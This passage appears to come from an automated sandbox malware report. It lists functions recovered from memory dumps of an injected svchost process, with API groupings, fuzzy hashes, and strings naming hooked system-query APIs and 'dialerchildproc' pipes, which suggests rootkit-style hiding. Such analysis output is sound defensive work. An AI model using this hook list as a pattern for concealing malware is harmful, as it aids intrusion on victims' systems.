                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                • API String ID: 4175298099-1975688563
                                                • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction ID: 65a3869f04434287a2e7461a52d4047f43856702f8c38511b053c3224d04ca12
                                                • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                                • Instruction Fuzzy Hash: 9E31987C105986A0FA08EF64EC716F43321A7E4346F94451B9F9916EA5AF3BC2DAC3C0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: 05100e2173929dac6a7f0a0e74b500ed2cf805a217f4a52c9ada1ad1fe11b766
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: 7E21327D624B4083EB10CB25F8547AA63A0F3D5B95F544219DF9902FA8DF3DC185CB41
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                • API String ID: 2171963597-1373409510
                                                • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction ID: b8174abafcbed4851b4a6d4f06aa0a09f7f5a9e489b1ae02c01d517591147634
                                                • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                                • Instruction Fuzzy Hash: C621413A61474083F7109B25F9543AA73A0F3D9BA6F504219DF9902FA8DF3EC189CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: 595544e6c8b5eb356c0fe469aa62110ee290ea274f5a14379f819f9652fa861e
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 39415B7B214B80D6EB608F62E8547EAB7A1F3D8B85F008129DFC907A54DF39D1A5CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                • String ID: d
                                                • API String ID: 3743429067-2564639436
                                                • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction ID: e364fe9ba6e10bce0f5738846fae8b44bfd57472a1e97a05519a5ea21eddf3a3
                                                • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                                • Instruction Fuzzy Hash: 4F414937614B80D6E7608F62E8547AAB7A1F3D8B85F008129DF8907B58DF3AD1A5CB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 878b1894e0747b522d643bc06064195b8b649effffff20599e8b1fc8f6cbaf3d
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: EC81D13D61474186FA509B699C613FA6290AFE5782F04401DDFC467FD6DABBC8C18782
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 05e0b7d978977c430931cf4a1903596006320a49131ddce92157791e861fd35d
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: A081AE396146C186FA50AF299C613F96290AFF5782F18442DDFC947F96DB3BC8C68780
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2633076698.0000016C21130000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21130000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21130000_svchost.jbxd
                                                Similarity
                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                • String ID:
                                                • API String ID: 190073905-0
                                                • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction ID: 0f3e0a6d576d6c1da82d8e22548eba1d662a50e86af85afd0fdb011be878c5ef
                                                • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                • Instruction Fuzzy Hash: C581CF396006C586FB249B169C713F96690ABF1B82F04402D9F8547F9EDB7AC6C6C7C0
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: fcb0aebfef704a42b30bb54349db129c50c363eafd5b8195f94279687c22beb1
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: 4031E63D212B4591EE11DF02AC207FA2394B7A8BA2F19051CDFAD17B88EF39C0C58381
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                • String ID: api-ms-
                                                • API String ID: 2559590344-2084034818
                                                • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction ID: b1452ed8ec4b996183525b8b8172cdbcf408286b410b2c5af2c88b7c0f27d6c6
                                                • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                • Instruction Fuzzy Hash: A031C9392126C496EE15DF02AC207F96394B7A4BA2F19451DDFAD47B44EF3AC0C5C380
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: 0face363e2cb8c0bee3317b607126d7ba7bb2ac6b9f65265e627c2b573a77838
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: E5119339334B4086EB508B16EC6436963A0F7E9FE5F004218EF9D87B94DF3AC5848780
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                • String ID: CONOUT$
                                                • API String ID: 3230265001-3130406586
                                                • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction ID: bf7e9455a38d92cba8f76b32b6ffd9fc638bc3fb2415792378c2fdc68b3d51de
                                                • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                • Instruction Fuzzy Hash: 93118E35224B4086E7508B42EC643AA77A0F3E8BE6F000218EF9987B94DB3AC5858780
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: a2a379eb7d189b7631a3c57ad6d33e18e6a529f2b645e47664a66a9de8cede0a
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: ECD19E7A208B8881DA709B19E8943AA77B0F7D8B85F104216EFCD57FA5DF39C581CB41
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: ab12cf9fa18d98c0c7b20da7bd6a79f10d6279ca1783c6524d2b18bed3e726da
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: F8D18F7A204B8885DA709B19E8A43AA77A0F7D8B85F104116EFCD47FA5DF3EC581CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: f9a115f38d00452e5ea098e85ee1cb7d94b79de93f4c0b3c8a0ba701e1bb5430
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 8D31A239721B5186EB15DF56AC242BA63B0FBE4B96F0440289FC817F54EB3AC4E1C784
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 76eb0573478cb9e543d378db3824b3ce4a5ca1622bba97411466568bda94d0b6
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 80318439711B91C2EB159F16AC642BA63B0FBA4796F0440289FDD07F54EF3AC4E28780
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 330b39928e8d4a0512e4b0e5befe440e038935c0cdc715f05207bc680191c48f
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 3D016179320B8196EB10DB16A8683AA63A1F798FC2F484039CF8943B54DE3DC5C5C380
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 6df4d5b338569d3bd063ea9b31b9fdceee70e06f8d8edbbfcb255024ecb4c22d
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 08016139710A8196E710DB12A8687AA63A1F7D8FC1F484439CF8943B54DF3EC5C6C380
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 934eb001b1cb7162b0e216a884923300c4674e87acb582378c00ea91b59b03a6
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: E611007D62174182EF149B21EC297A766A0B7A4B43F04052DCF8907B54EF3EC4888784
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 64e59f46e64f06106c6c836562cd6f2a238e09a8be9dfe14bfa89a9781147d00
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: E711007962174082FB159B21EC297A767A4B7A4B46F04052CCF9907B54EF3EC4898780
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: f7ba546e9277d5811feab243473af8ccecbc6f33e557625624f296682fe93f4d
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: 5951C03A2117488AEB14CF15EC54BA937A6F3E4B99F508128DFC667B4CDB36C881C781
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction ID: 1d30a4ad186390c9e0d4840222c74d1c9733709403f953b60591c853786e2936
                                                • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                • Instruction Fuzzy Hash: 57519F3A2116848BEB18CF15E854BA93795F3A4B99F50812CDF9647B4CDB37C981C780
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 38928c02b528579af5d7bae62b313c1acf318529d3f074dccf620c7c50be4a79
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 9BF0497A32464192EB208B21FDA43EA6770F7A4785F848028CFCD46D54DE3DC6C8CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 9b7840b394ccd3146b75787221a045a794df19c5b2db47af64ea84a163f0a43f
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: FAF0123531464191E7608B11F8A43EA6771F7D4785F848028CF8946E54DB3EC689C740
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 4377eca575200541bc068a17ec7c44b59f055b8dd3054bdcbf4df45d710714a1
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 49F05E7C624B9092EE008B13BD241AAA221ABD8FD2F0881359FDA17F68DE39C4C1C744
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: 09a551e2576c1e1e1828cb1cd6a88af1379804f78d2d462a0b9fb8b4ec20fbc5
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 70F0543825478091EA104B13BD241A65221A7D8FD1F0841399FDA07F58CF39C4C2C340
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: bb09d4438f15394d5284822d0427073e105dfb170ff5edabe1c69cf5f87db961
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: BFF0FEBD33174491EF594B60ECA43B62760ABE8BD2F44201D9E8B85EA4DE39C4C8C790
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 82d18f0b93f92c228c2b74be57c17776735e3b83a3eb480ea41b3336fafa7092
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 7AF0FE7972168491EB554B60ECA43F527A0ABE8BD2F44201D9E8B45FA4DF3AC5CAC780
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: dd61280ac11a25296d520c90dfdaece8e28f6ff81278e64993a8f652d91a9b14
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 6A02EC36219B8086DBA0CB55E8903AAB7A0F3D5791F105119EBCE97FA8DF7DC484CB41
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: 356b17c029959c08516d84d7cd97fa2a6821d2801db75080b43b419af4c228c3
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 3802BB36119BC486D7A0CB55E8943AAB7A0F3D5795F104119EBCE87FA8DB7EC484CB40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: fe77374a09dca7d543514377ed791f002296bac17a533dad29f1ebfb35ee49eb
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: AA81AF3EA2065089FF509B659C603FE26A0F7E4B86F44421DDF8A63E91DA36C4C1C391
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: d5fbcfd7ec085aab715a47625d0c055684090887df5d9bbfaf1f5676c6585595
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: 4E817D3A61075089FB50AB659C603FD27A0B7E6B9AF44421EDF8A57F91DB36C4C2C390
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000D.00000002.2637209342.0000016C211C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C211C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_13_2_16c211c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
